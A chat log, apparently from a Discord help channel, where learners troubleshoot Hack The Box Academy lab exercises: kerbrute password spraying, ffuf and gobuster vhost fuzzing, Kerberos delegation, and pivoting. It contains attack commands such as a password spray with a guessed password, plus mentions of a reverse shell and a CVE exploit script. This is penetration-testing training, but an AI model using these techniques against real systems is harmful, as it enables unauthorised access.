#modules

again you didn't include the command and you should use netexec instead

Why doesnt it work using crackmapexec though? It's a bit weird

cme is deprecated

When trying to do it using kerbrute, using this command

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 users.txt Welcome1

I am getting this error:

@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...
@inlanefreight.local:Welcome1 - NETWORK ERROR - Can't talk to KDC. Aborting...

looks like your pivot isn't working then

it is, i can xfreerdp using it

you can rdp to dc?

yeah

but i get the same error here, when trying to do it using the windows host (dc), using windows kerbrute

I just checked, you cannot rdp to the dc, so idk what you're rdping into

sorry not DC01, MS01

that's not the dc

my bad

if kerbrute doesn't work there are other tools for password spray

you should target the dc with kerbrute, it works for me

it keeps giving the error “can’t talk to KDC”, even when targeting the DC

you can try resetting it, the lab I just spawned works

alright, ty!!

it shouldn't use port 53 by default

you can try this https://www.linuxuprising.com/2020/07/ubuntu-how-to-free-up-port-53-used-by.html

that's your own ubuntu machine yeah? I'm afraid you'll have to google it

yeah ubuntu will have more services running than a pentesting distro

hey, what's the issue with the scripts?
apparently I used that one in python3 https://github.com/dpgg101/CVE-2019-10945

You're giving a lot of spoilers dude

marcie

how you sof ast to responding to people

All the information are from the content, I haven't even started the exercise

The answer to 3 is the machine account;
1 and 2 relate to the questions

I suggest doing the exercises before asking questions

MarciePedia

Still spoiler as I believe this module is above tier 0

I wanna help but the second I notice an unread message you three are already there >:( Xre0us marcie, and you

I helped your guy from this morning finish his module

https://tenor.com/view/keemstar-im-fast-as-fuck-boi-keemstar-run-running-fast-gif-18083431

:(( apparantly I wasnt good enough for him

I also just woke up

Omg you slept

I spoke to you earlier this morning tho :p

@languid fjord , we can jot it down in our notes. Marcie Lee slept

God forbid a girl has hobbies

yeah right

jkjk

Oh, alright. I apologize. Thanks for answering

filter to just this channel

almost half T_T

okay leave some for teh rest of us 😭

they are currently training an academy llm just based on marcies posts : D

hahaha I wouldnt be surprised if they were

I also read stupidly fast

also my hands smell like fries and it's bothering me a lot

chatgpt is more poilte though

:(

marcie take me under your wing

teach me the forbidden craft of the comm contributers

Hey, In Windows Fundamental Module. I can't able to reach out internet from the deployed windows instance in the module section. I ran network diagnostic and it shown me some DNS server issue so i changed the dns server to 8.8.8.8 and also thought if it maybe a firewall blocking and disabled it. But nothing resulted as expected, Any help please?

the ai politeness is annoying anyway

https://tenor.com/bzyoi.gif

First: sell your soul to tech support

^ what marcie said

The targets/instances aren't connected to the internet

I dont think youre supposed to be able to access internet from the target machines

Any downloaded tool you'll need to transfer to the target

So download first to your host, then open a share on the target and then copy paste to target

Preferably portable executable

okay, now i understood. Thank you.

hah he thanked me, take that marcie

/s

¯_(ツ)_/¯

marcie you done any of the prolabs?

https://tenor.com/view/haha-good-one-the-office-smh-no-gif-14556369

Hey @median anvil

Do you like Marvel films?

https://tenor.com/view/thor-avenger-mjolnir-hammer-gif-16377773

BAM

https://tenor.com/view/bruh424019499-gif-25675566

hello

Try running the collector again

what module?

is possible to ask question for the academy

iirc you don't count certain users

so the number you have - 3

https://tenor.com/view/straight-to-jail-crime-criminal-gif-16779501

yeah number you have with path but -3

Jk ask the question @idle python that's the point of the channel my dude

i did'nt find the What is the API key in the hidden admin directory that you have discovered on the target system?

It helps to provide module and section name

In short though; your hint is 🤖

Is INFORMATION GATHERING - WEB EDITION in section Skills Assessment

It's on one of the subdomains

yap

Those are your only hints

but i didnt find any admin directory in my scan

You're not gonna find it in the scan

.

huh

that's the correct answer once you convert it to %

unless they changed the answer

I'm saying you can't count some accounts so it's gonna be the number that I gave

anyone else experiencing troubles with Easy Lab of Attacking common services module?

If you still stuck
DM!

sir how find admin directory? and after to find hash

Brother

yap sir

What's one of the default files that tells what web crawlers can/can't access

🤖

^

🤖.txt

Also as a hint; read above the skill assessment.

There's a list of things you'll be tested on

sir after my scan i didnt find anything is possible to show screenshot

http://url/🤖

Why are you scanning?

Well ffuf/gobuster might find it

But it's a common file

i need to find admin direcotry and after that to find the hash

.txt?

Yes but it's 2 steps

Analyzing 🤖 will show you the way to the hidden admin

Not scanning

Ye

It's in like 90% of directory lists afaik

Oh ok

Hello amigos. Hope everybody is feeling epicly good. I have a question regarding the data gathering module. When you perform a zone transfer with dig to get additional subdomains and info does this affect the initial zone and deletes it? or we can request a zone transfer to get the info wihtout affecting the target?

Kali and parrot have it installed by default. But if you're facing dependency issues idk

It does nothing to the zones

Yeah

maybe pipx is conflicting with system packages, just pick one and uninstall the others

A zone transfer is like travelling to a city and getting a map

You can easily git clone impacket and install it

you shouldn't get depency errors with pipx, it should install all the needed stuff for you

^

Did you try installing Kali in a VM?

pipx doesn't use system pacakges

that's the whole point of it

Nice :D

8 gigs for VM for me is enough

you could even put 4

You don't use 100% of RAM for vms dude

^

8 gigs if you have 16 is different than 8 gigs if you have 8

Still wouldn't use 8 gigs even if you have 16 on system

generally half is fine but just leaving host with 8 gigs is rough

Ye

4 should be more than enough for a VM

either way I've never seen pipx having dependency errors, maybe give the command you've used and the errors

what's the command and what's the error

I'm stuck on the Patch skill assessment in Secure Coding 101. I have what I believe to be a working solution to validate and sanitize the inputs. I've tested it by replacing eval with console.log to verify that the check function call looks clean in the output and it seems to work locally after rewriting it, but when I upload it I get an error stating that the check function is not being called. Prior to patching I was able to execute command injection successfully, so I think I'm on the right track if anyone can offer a nudge? DM's welcome

try with just pipx

sudo apt install pipx
pipx install impacket --force

or maybe uninstall first before you install

pkg_resources was removed from the standard library with 3.12 and moved to setuptools

python3 -m pip install setuptools

setuptools should already be installed

Cool 😎

huh venv is not used at all with those commands

Sometimes Kali doesn't need venv to install pip packages

if you've set it up right it's not needed at all

Nah

why do you need bluetooth for a pentesting os

I suggest debain and using a VM for pentesting

that's fine but don't use a pentesting distro for that, you can run it in a vm

yeah i know... but it will depends on how they call their package like impacket-psexec or psexec.py, etc those are all linked, alias, whatever, somewhere so... anyway problem solved

yeah

proper pipx install will call the ones in their contained venvs

yeah without sudo and without python -m.
never had an issue with that either

there's no reason why pipx shouldn't work but idk

if they do not do pipx ensure path for instance so they call the old packages? since old system and new pipx packages will be called by the same name?

oh yeah that's probably it

it's still calling the old stff installed by pip

Anyone that cleared this section from API Attacks? https://academy.hackthebox.com/module/268/section/3064

Just ask your question. I'm sure there are several people who have successfully completed this section

Well its confusing wether or not I should authenticate at the start.

You don't have any creds. So how do you want to authenticate?

From earlier in the section

No, the task at the end of the section does not give you any creds. You do not need any

i just downloaded kali linux

using discord with it

you are now officially on the path to becoming a nation state actor

but not used to it

it's kinda hard

lol

The academy team are goats!

I'd recommend looking at the hint to start

But now I'm unauthorized on all endpoints, so what am I missing?

Footprinting --> Assessment hard -- any hint on this task - used onesixtyone and braa --> no results

Hello all

netexec

it's not an alternative, it's an upgrade

https://www.netexec.wiki/getting-started/installation/installation-on-unix

How to enumerate users in exercise in "Brute-Forcing Password Reset Tokens" from "Broken Authentication"? I tried to enumerate it by the response timing, but it didn't works.

I am currently in the Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. I added the inlanefreight.htb in the /etc/hosts. and i found at there is a ns. subdomain, i added the subdomain in the resolvers.txt and when i run the subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
i get a IndexError: list index out of range

Yeah, that is normal.
Because htb is not a valid top level domian. In other words, ns.inlanefreight.htb cannot be resolved.
Use the IP address instead

nice thank you

Please anyone send the mod of gesture suite

when i run the command i get al these codes but none of them work fot OTP

Maybe you can try filter differently?

I tried -ac-c-ic

I get no result

Did you try filtering on size?

The command I provided does that automatically

No all youre results have a size of 2867, what happens if you filter those.

get nothing

Are you sure the url used is correct?

Check you URL in the ffuf command

Attention, you are not pinging your target here. All IPs that are specified with a port are Docker containers.

Bunny can I DM you regarding api attacks

I ended up solving this and completing the Secure Coding 101 Javascript module. If you're stuck on this one feel free to DM and I'll be glad to help

sure

Module: Information Gathering - Web Edition
Section: Creepy Crawlies
Section link: https://academy.hackthebox.com/module/144/section/3079

We are provided with a custom script (ReconSpider.py) for crawling. Do ya'll have any go-to alternatives that perform the same functionality as this script? Does ZAP do it?

Just finished Attacking Common Services - Easy (tbh not that easy today ) . What a journey....

i tried a bit with project discovery katana which is a nice tool, but couldn't get the same results. i did not persist though. But that script works well.

I see. I was really hoping that this script's functionality was already built into some popular spidering tool.

you got issues with the script?

Oh, not at all, it's wonderful. My only concern is that one day I may not have access to it 😂

It presents information wonderfully and even retrieves comments.

I just wanted to have alternatives at hand, y'know?

yup, i found katana randomly so i've not search for crawling tools, i'm sure there is plenty out there

i am script kiddie

Hello. Are you getting a false positive using crackmapexec?

Hello, I am doing Unconstrained Delegation - Computers from the Kerberos Attacks module. The first question asks us to capture the TGT of a user that authenticates to our machine and then list a specific share on DC01. I have the TGT, tried renewing it and also requesting a specific TGS ticket, but none of it seems to work. The user is also not part of the Domain Admins group. Is this intended? I could just compromise the whole domain and answer both of the questions. EDIT: I can see the domain administrator's ticket in memory with klist tickets, but I am still not able to access the shares on DC01. => SOLVED: apparently net view does not use Kerberos authentication? Using Get-ChildItem or the alias dir works just fine.

Hi, I have a question,
What is ldap and kerberos and why they are important

I need help with hashcat idk what I'm doing wrong

Save it, back it up, post it on a private repo

Kerberos is an authentication protocol
Ldap is what Active Directory is built on
<L>ightweight <D>irectory <A>ccess <P>rotocol

It helps if you provide the academy module and section

thank you

what do you need help with exactly?

I need help with What does the header on the title page say when opening the aquatone_report.html page with a web browser? (Format: 3 words, case sensitive) in Attacking Common Applications > Application Discovery & Enumeration . I feel completly stupid but i tried every combination in this:

I literally have the complete module finished execpt for this

The second question 😄

It's likely changed since the creation of this question

Wait

It's looking for <Header> not < Title>

There is no <header> tag in the html

No

Figured it out thanks

Sweet 🙂

However it has nothing to do with the title or menu bar @surreal totem

Pages...

wow

Ok thank you, got it

Also header tags in html are <hN>

Hi, could someone give me a nudge, please?

Module of Command Injections:

Section: Advanced Command

I bypassed every filtered character, but I get no output, regardless of whether the IP is included or not.

Obfuscation.
https://academy.hackthebox.com/module/109/section/1039

This is the original command without obfuscation:
find /usr/share/ | grep root | grep mysql | tail -n 1

Can I share with you guys the obfuscated payload I am using here?

Hello, I don't think that the VPN is working, I downloaded the file on my VM, did "openvpn htbvpnfile" and its connected but the box doesnt respond to pings

Some machines can't be pinged, if you scan with nmap -Pn does it show ports?

<@&861185840277487616>

sorry

Illegal bro

absolutely not

No : (

Reset the target

Module of Command Injections:
Section: Advanced Command
Hi,
Can I share the obfuscated payload I am using in the lab? I’d like to know if I am doing something wrong.

Hey guys. I'm currently doing the DACL II skill asess and i'm having a question

PS Microsoft.PowerShell.Core\FileSystem::\SDE01\Shared> whoami
nt authority\system
PS Microsoft.PowerShell.Core\FileSystem::\SDE01\Shared> icacls .\clearcache.bat
.\clearcache.bat Everyone:(I)(RX)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files

PS Microsoft.PowerShell.Core\FileSystem::\SDE01\Shared> echo 'test' > .\clearcache.bat
out-file : Access to the path '\SDE01\Shared\clearcache.bat' is denied.
At line:1 char:1

• echo 'test' > .\clearcache.bat

•   + CategoryInfo          : OpenError: (:) [Out-File], UnauthorizedAccessException
    + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.OutFileCommand

how is this possible?

UnauthorizedAccessException

doesn't the icacls output means that nt system can full control the file?

Haven't messed with icacls in a minute

But are you running the powershell as admin?

Wait nvm I missed that

If you read and follow #welcome you can wrap the output stuff in ``` so it formats properly
```

Like this

```

Makes things way easier to parse

i am

Could have some other protections

> overwrites

Maybe you can append to it

I'm on the virtual hosts section of Information Gathering - Web Edition, and I'm facing some difficulties. I read on a forum that there are some issues in this module. Is anyone else facing problems solving it?

No issues here

Did you use Gobuster, or Ffuf?

denied as well

Both

Command slightly varies between them

Yeah, I got both of them to execute fine. Gobuster is still going, and Ffuf gave me a huge output. I saved it into a file, and I grepped "web" to answer the first q, but there are so many lines.

https://gyazo.com/24a740990dcb3a187c162511102bab7f im doing the session security modul the part of the packet sniffing , but for some reason the wireshark wouldnt let me interact with the filters

its greyed out for some reason

nvm i needed to change it to string

add -ac to ffuf

and for gobuster you made sure to do --append-domain yeah?

Yep, i did that already. However, it turns out I completely missed editing the /etc/hosts file lol

I'll rerun it after editing. Let's hope it goes well

yeah that'll probably help

What's the reason the previous method of putting the IP:Port directly not working? Is it because enumerating virtual hosts requires us to make that edit before using tools?

Vhosts require a domain

simple as that huh

At least for gobuster

thank you

Yeah, it needs a domain to append

It grabs the header info from the connection

yeah, it wouldn't make sense to not include it

i wanted to include it initially, then i looked at the module and it mentioned IP address

As opposed to ffuf where you define the host header with -H

so i was like, "oh, nvm then"

ffuf gave me a huge output

i didn't know how to comb through the details

Yeah and you can filter it

2 methods; use -ac or -fs [common size of responses]

-fs 612, right?

If that's the common size

-ac autocalibrates to throw out junk responses

You can specify the domain with gobuster, you can check it in the help.
And that post #1256137742950334556 message

i see

thank you, i'll try it out after removing the domain from /etc/hosts to see if it acc works

You can comment out the line

that one didnt work for me either. i had issues with droopescan as well

never. the CVE script now works. deleted what i had, reinstalled, re-installed 'click' which was causing issues, and now it works .... no idea why it works now as everything i did was the same lol

Guys if I'm using dirbuster and I see robots.txt and in robots.txt there is another directory in text, why didn't dirbuster catch that directory that is in robots.txt?

Like dirbuster said robots.txt and inside of robots.txt there is adminlogin but dirbuster didn't show adminlogin

can anyone help with 'attacking common services' - 'PTRG Network Monitor'

https://academy.hackthebox.com/module/113/section/1094

I have followed all the steps. at this step, there is supposed to be a 'Test' button in the middle columns, next to 'Active/Paused' but its not visible on me. and the code in 'pwn' doesn't appear to be running (its a blind code execution.

logon scripts

ty for fast answer as always

because /robots.txt tells web crawlers/scrapers where they can't access

the purpose is to give a scope to bots

¯_(ツ)_/¯

also could just be that directory isn't in the wordlist you used

one of the users you have can edit it, check again

okay thx i'll look into it

also spoilers

Wdym a scope?

yeah sorry, will remove that

you should google what is robots.txt and why it exists

it means that robots/scrapers can't access certain directories in that file

well are you able to get the cookie using that payload?

because your account isn't linked ( see #welcome)

if you can get the cookie that would be the answer, the flag is the cookie

Thank you!

Thanks to you too.

Oh yea sry

hello

someone can help me with the first lab of broken autentication pls

i have to enumerate users

Footprinting - DNS Q4
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

How long does this scan take? I'm trying to speed it up but it's still taking quite some time...

I'm using DNSenum and a wordlist, I tried many yesterday but had no luck so far. I'm just concerned there is a much faster way to do this that I'm missing so any advice would be appreciated 🙂

Thanks

Well, if you enumerated the user simply place it in the answer box and hit submit...

which word list are you using

I tried a few from SecList but currently using the namelist.txt one

try a more fierce wordlist. also, i brute forced this and didn't use dnsenum (not sure that really matters) but the word list matters for sure.

Yesterday I worked through the subdomain lists 5000, 20000 and 110000 I think but I will look at trying other lists, thank you 😄

subdomain of a subdomain

for my own personal curiosity though, besides --threads and the size of the wordlist, is there anything else that one can look at in regards to adjusting speed?

is there "anything" you can do is pretty broad, of course there are things you can do

in practice the answer is no though

Do rooms change? I was in getting started module and I did 10.10.10.10:1234/adminloginpage.php and there was the login page with username and password in the source code. Now that directory isn't there anymore and also robots.txt gives me 404

rooms?

Module

I'm used to thm

no the modules don't change, unless they are updated which isn't very frequent

Idk bro I tried a good amount of stuff. It looks like the directories changed

Also gobuster can't find robots.txt and adminloginpage

well i do know

And I found the flag : ( but I wanted to try another exploit and I left it there

the modules are not dynamic upon spawn, they are static

I'm almost sure there is a problem with the "victim" machine, sometimes gobuster works sometimes it times out, some pages load on the website some don't even tho they exist

you could try changing vpn regions

i cant enumerate, i tried but i didnt do it

why can't you enumerate? what's the error/issue?

i have to find a valid username, i tried with ffuf with the list they mentioned and i recieve an error, after that i tried manually and i didnt find a valid username

what error did ffuf give you?

can you ping the target? dm me the command you're using

Hey guys, i have no experience or knowledge in AD , do you think i should start with the introduction to active directory module from the academy or something else ?

I did

Both on the workstation and on my own vpn

which vpn did you go from, and which too? if it's not the box's end its gonna be your end

ok

From Europe 3 to Europe 6 I think. But I think it's on htb because I tried both from my VM and the workstation and like 10 minutes before it stopped working I was looking at the flag on the screen

Idk also tried on chrome

Like to open the workstation on chrome same thing

That's not a region change. Try going from EU to US

if that doesn't do it, you're probably doing something wrong and it would help if you gave the module/section you're stuck on because it would provide a lot more context. sorry if you already mentioned it i just got here a bit ago.

Doesn't work

k then you're probably just doing something wrong

It workED

The module is "getting started" under "public exploits"

I saw the freaking flag and I skipped it because I wanted to try another thing : (

And now it keeps timing me out

sorry i haven't done that module so i can't really help

reset the target

as that one is using a public IP and port if i'm recalling

Intro to AD is top notch for getting the basics of AD

(note it doesn't dive into great detail of stuff that's covered in the higher tier AD modules)

but enough of an overview for you to go "oh, i get it"

no need to send stickers in multiple channels

<@&861185840277487616>

spammed in all the acad channels

Thank you

holy shit he lives

thank you

Hey everyone, how might I use the USN journal to determine where a file originated from? Is it possible? I've tried following the parent entry numbers but it hasn't taken me anywhere useful.

Hi, I'm going through Info. Sec. Foundation module, Linux Fundamental and have hit on an issue. I need to find the name of the last modified file in a specific directory. I searched and eventually found a solution that provides the name and not the inode, or modification time and date. However, the command is quite long and as the introduction to Bash commands is terse, I was wondering if (hoping) there was a more concise solution than the one I have. I'm not sure whether I should post my solution, so I would also appreciate guidance on this.

man ls

but also this module requires a bit of tinkering with commands

to introduce you to the linux environment

ls can be pretty useful

i'm often always including -la whenever I do it

also biggest and hugest tip when dealing with linux commands

man <command> or <command> --help often give you info on how to use a given <command>

also sometimes some critical thinking is required

also it's not information security foundation module, that's the path; there is no InfoSec Foundation module

@fathom pendant ls is wieldy! I have no idea what I am looking for; I have read it - but not in its entirety. If you consider the solution to be in the ls command and its attributes, then I'll be a bit more thorough in reviewing.

note what inode could potentially be short for

index node

:)

@fathom pendant Thank you for the correction.

Thank you, also, for the search tips.

My present solution utilises find and pipelines. It works very well, but is too much to remember. On remembering; I have heard that in order to be successful in programming/coding, the skill is not in remembering, but in researching. The manpages are very useful, but not always accessible where solutions are required.

also it helps others help you if you also include the section you're working on

not everyone has a vault of a memory to know exactly which section you're referring to

but learning in this field is all about breaking out of your comfort zone to learn something new

another day, another person helped, good job marcielee

@coral acorn I did not give permission to DM :)

@fathom pendant
I thought I had provided that information (Linux Fundamental(s)), but I understand; I'll be more diligent in future.

Linux fundamentals is the module name

the specific section you're on is generally near the top of the page

or is highlighted when you look at the index on the right

the PATH you're on is the Information Security Foundations path, it is not a module itself

modules are the learning things you unlock, like a book you purchase; Sections are like the chapters in the book

i didn't know I had to ask you for permission

anyways can u help me with that?

A pathway is like an anthology of the books -- a pre-arranged collection for the best experience

i'ma be honest i didn't read it

@fathom pendant
Ah...
"Working with Files and Directories"
Got there in the end.

also #rules

great

i'm not obligated to read unsolicited DMs ¯_(ツ)_/¯

you can't post images btw because your HTB labs account isn't linked (read and follow #welcome)

it's okay, I was just seeking a solution

just ask your question here and include the module name and section

¯_(ツ)_/¯

I am currently doing the Tapping Into ETW in the Windows event log and evil module, I followed the instructions to the dot but for some reason the json file generated by silk does not contain Seatbelt

can anyone explain what i might be doing wrong here

did you run silk then seatbelt?

that's my only thought ¯_(ツ)_/¯

gotta run a before b otherwise it doesn't catch it

it didn't say that in the module :(

how is it gonna catch seatbelt if it's not running to catch it?

i thought seatbelt is like a log parser

which cleanly puts specific stuff from a log into a json file

guess i misunderstood

i forgor which is which tbh

Hello I going throught the Info Gathering Web Edition. I am at the Assessment part. The question is asking for API Key in hidden admin directory. I try bruteforcing and many other technique that show in the module it doesn't work.

Is there any other approach for this?

mb it is seatbelt then silk @rustic spire

🤖

Also the crawling it only provided empty json file

that is the hint

no u were right when i ran silk then seatbelt only then it worked

and i found the info in the json file

👍 yeah i vaguely recall people saying that order

maybe that module needs an update?

it doesn't say that in the module, would help people with zero experience in windows event log like me

Hello I'm having trouble with "RDP and SOCKS Tunneling with SocksOverRDP" I rdp to foothold host 10.129.XX.XX then successfully load dll and setup proxifier then mstsc to Pivot Host 172.16.5.19 and run SocksOver-RDP-x64.exe successfully, then back to Foothold Host, I set proxifier with 127.0.0.1:1080 SOCK5 then I connect to the target host 172.16.6.155 and this error shows up. I think I do everything correctly including ||turning off antivirus at Initial foothold and uninstall windowsdefender at Pivot Host and run every tools with Administrator Privilege|| is there a mistake I made or is this suppose to be a Lab error since I don't see anyone else having this issue.

yeah looking at the official solution ™️ it shows using silk then seatbelt

make sure you do everything as shown; you also don't need to uninstall defender

in the explaination on the other hand it doesn't specify

like the main module

if that fails, change vpn regions (EU → US or US → EU)

OK thanks I will try that

After that, we can proceed to simulate the attack again

m

might just be slow

:) it took me a min to find it but it is indeed there

only me lmfao

nah

trust

you're not the only one that's asked

that's comforting 😂

also as a suggestion for this module could be to add different hex values for finding different specific things

in the options for silk

#1234357888114364508 <-- ¯_(ツ)_/¯

Anyone have finish the updated Info Gathering Web Edition Assessment? Please provide me some clue. I got stuck with getting API Key in hidden admin dir

I did give you a clue: 🤖 <-- think what this could refer to

a certain .txt file 😉

i try the robots.txt it display 404 error

are you on the right subdomain?

¯_(ツ)_/¯

I try doing dnsenum to get subdomain also got nothing too

dnsenum won't work

as DNS isn't running

you'll need to use ffuf/gobuster

ohh I see. I try it

thank you

big tip; don't always rely on one tool for a method

since i believe this assessment is on a public_IP:port you're gonna have to adapt

I need to add to /etc/hosts

kind of confusing at first

brother it's something that you kinda gotta do a lot, especially in this module

it even gives you the base vhost/domain

it's not like they just threw the IP at you and said "good luck," the entire module up to that point should have prepared you for the skill assessment

Aight, I do my best

if i may add, just try to understand DNS on a high level, difference between vhost and subdomains, what the tool do, does it query a dns server, try to recognize a private domain, since it is private, it could not be in public records so how can we resolve the private domain, etc. it will help you use the tools with more ease

i mean the ip for this skill assessment is public

it's a public_IP:port

so seeing that it's a private/public IP doesn't do much

it's moreso realizing that since it's a given target; use given info to attack it

the domain is .htb or .local isnt it?

yeah

either or; it's not gonna be on public DNS

and since it's a public_IP:port; your only scope is that IP:port

no other ports

so DNS enum won't work- - since 53 isn't running

(and if it was it's not set up to interact with that port, likely)

the scope of any public_IP:port given in academy is solely the port given on that IP

i understand what you mean i think. It is just i find more useful to understand those concepts than knowing tricks related to the htb platform. Both are important and useful but i just see lots of questions which could be answered by basic dns understanding or other basic grasp of the subject in question

also i do not mean to undermine what you are saying, just trying to help, and what helps me most of the time is going back to some basic understanding

yeah i agree

basic understanding is necessary

but also kinda normalizing a statement too much may lead to confusion

@fathom pendant I finally finish the assesment thank you man

but I found an issues or maybe I doing it wrong. The question that want me to craw the inlanefreight.htb to get full email. It output nothing and I got the answer from the last question instead

that is correct

it's not an issue

it's just something that requires a bit of digging

Aight it was stressful, but fun at the same time

thank for your advise, on my way to another module

Crazy fast speed you are going. Do you have previous experience with pentesting techniques etc?

No sir! I only have Sec+ from a couple years ago but haven't ever done any work in IT or pentesting or in the field at all. Just learning on my own time out of interest

Can i shoot you a dm?

Sure thing

just don't crash and burn

you really shouldn't be blitzing through the content tbh

In FOOTPRINTING/SMTP https://academy.hackthebox.com/module/112/section/1072 there is this hint. But i don't know where to find this provided wordlist mentioned there?

resources button on the page

damn, thx ❤️ the button didn't catch my eye before

how many similar modules are there in cbbh and cpts? I completed one, and I got some percentage in cbbh

only surface level web stuff

Hi, team! I need help on this module. I do following the step-by-step tutorial, but after I upload the splunk_shell on the target, I did not get any connection on my listener.
Can someone help me?

I already tried many times.

did you replace the relevant ip for your own, alongside port?

Yes, I do change the IP and PORT on the file

I already archive this folder into .tar.gz and .spl. But after many times looks like it didnt working well.

Is there any step that I missed?

hello amigos. I hope everybody is having an amazing morniiing :). I have some issue with the VHOST chapter under the Gathering information module. I was able to include the ip and the inlanefreight.htb name server inside the /etc/hosts file. Then i try to run this command with gobuster to get the vhost but i can't seem to get any results. Do you know why this is happening. A lot of people are reporting that this module might be broken, Do you know if this is the case?

What does your hosts file look like

Module not broken, user error

Also you need a domain for gobuster to append

you mean after the --append-domain flag?

Found the user error

You don't include the port in the hosts file

Sniped the human base error :D

Will go and do that

Done deal. it worked :D

No ports in Hosts file locos

Thank you @fathom pendant for your daily answers. wish you an excellent day ahead

o7 broken brains

hahahah

Nvm, I restart the machine and retry the process. Solved

Hello, community!
I'm trying to solve a "Brute-Forcing Password Reset Tokens" section in the "Broken Authentication" module. I have successfully reset the password for the admin user but I don't know how to find another user and reset the password for him. If anyone has solved this exercise, please give me a hint.

smtp-user-enum

you might need to adjust the timeout variable to at least 20 seconds for a response it is rather slow

Anyonhere finished that I can ask a few questions? Its Injection attacks - XPath - Blind Exploitation
https://academy.hackthebox.com/module/204/section/2226

nope it's a standalone script

Just ask your question.

the wordlist from the module resources yeah?

yeah that'll work

also you might need to remove the @domain from the result

:P

Hello , I recently joined HTB Academy and wanted to learn windows fundamentals. But I realized that they were using certain terms that I didn't know about.
Should I do Linux fundamentals before windows fundamental

Which terms do you not know? I don't think you will learn things in the Linux fundamentals module that will help you for the Windows fundamentals module

Hi everyone, how can i solve the challenge related to AI-Ml challenges

Any guide for start

in HTB Academy maybe or anything else

does anyone know how to mark a module as favorite ? it seems you can only do that with owned modules for some reason

Just click on the heart

I think the first term they used that I didn't know about was cmdlet

i only get the heart option if I enter a module, and to enter a module you need to own it

you have to go to the module search page, then you can click on heart

anyone has a reply?

thanks a bunch, that worked

This is a command in the Powershell

Thank you. If there is any prerequisite to windows fundamentals kindly let me know.

hello, can anyone help me with enumerating subdomains/vhosts on htb?

Sure

so the issue is that i literally cant enumerate them

the correcet sub/vhost is in my wordlist

but no matter what tool i use i cant find it

What command are you using?

only after i add the sub/vhost to my /etc/hosts

What tools are you using

which module ?

gobuster, ffuf

Commands?

ffuf -u http://board.htb/ -H "Host: FUZZ.board.htb" -w ~/custom/wordlists/subs.txt

gobuster -u http://board.htb/ -w subs.txt --append-domain

Have you entered board.htb in the hosts file?

yes

im also using wsl2 if thats important

So what's your output?

nothing

it just goes through my wl and says it didnt find anything

no errors too

Is wsl connected to the VPN?

yes

with root too

Can you ping the box?

board.htb yes

but not the correct vhost

Before the -u flag, enter "FUZZ"

help please i have connection issue to a machine

so -u http://FUZZ.board.htb ?

For example, ffuf -u http://FUZZ.board.htb/

im connected to a vpn and i cant ping the machine

Ye and try again

will try that thanks

capital btw "FUZZ"

Not every machine responds to a ping

this machine should

ok i found out the problem

i download udp connection config file

instead of tcp

can normal domain user be able to query domain information? like user and group or is this a vulnerability?

still didnt work

How do you know your connection is successful? Does it say, "initialization sequence completed"?

did you tell which module you are doing?

||└─> ping crm.board.htb
ping: crm.board.htb: Name or service not known||

Do you know the machine you're doing does actually have subdomains to discover?

it does

the one right here, and this vhost IS in my wordlist

I mean it says Name or service not known

Add this to the hosts file and try to visit it

i can enter board.htb in chromium , but i cant visit the subdomain

if i do it then it works perfectly

but i would have to look up the solutions for boxes just to get the subdomain to work

Is board.htb a subdomain?

no, this is my /etc/hosts

now i cant access or enumerate ||crm.board.htb||

i can only do this after i add it to my /etc/hosts

Oh you mean you can't visit crm I thought you were referring to board.htb as a subdomain mb

i added board.htb to my /etc/hosts after the first nmap scan

Any advices from which module do unlock from the following?

Active Directory LDAP
NTLM Relay Attacks
DACL Attacks II
Active Directory Trust Attacks

but now its impossible for me to discover subdomains without cheating

He did

dude omfg

no way u too

Didn't you add it to the hosts file?

guys, i want to discover the subdomain on my own. Now i would have to look up the solution to find the subdomain on the web, then add it to my /etc/hosts, because otherwise i cant access/enumerate it

no i didnt 😭

You said you did. I asked you to add it to actually test if the subdomain is working.

Anyways, you have any firewalls?

i said that if i add it it works, no i dont have any firewalls.

crm is on line 107 in my wl

guys if i didnt spend any money in HTB academy, and i am a total beginner, and i want to try to do a XSS attack what do you recommend me to do?

what is it?

So if you run the ffuf command from earlier, you do not get anything back? Usually it returns a default result for any try and you need to filter out based on size / words / whatever

def not LDAP, the other 3 are quite close

just take whatever you want to do

yeah, i get nothing

and if iwant to speak in general how can i do that ? like get the roles

ok, is it like a module in the academy if so how much does it cost?

oh really ? nice what is the name again?

ty mate

Try this: ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /path/to/wordlist.txt -v -mc all

i will check that. and if i am like a total beginner will i manage to succeed the course? or will it be tough because i do want to learn and try but i do not have a lot of knowledge. are they explaining good there/

I made the wordlist smaller, but it still includes 'crm'

You're getting errors that's why

oh, i tought it just means that these dont exist

and how much time did it roughly take you?

wait, lemme try gobuster

No you shouldn't be getting errors. Are you sure your etc/hosts file is correctly mapped to the IP?

Now you got it

Ye this working

what did u change? :3

Now just filter size

it just showed everything that was in the wordlist 😦

Yeah filter by size

i understand, ty mate

oh shit

That is expected. It returns a „default“ for each request, you need to filter based on the size, words or lines

damn thanks, gobuster also worked

just no

but i dont get it why it didnt work

but that‘s not the reason… The webserver serves a default vhost if no specific match was found

Great 😃👍 😎

What command did you use at last?

The one I sent you?

gobuster vhost -u http://board.htb -w ~/custom/wordlists/subs.txt --append-domain

but i tried --append-domain yesterday and it didnt work then lol

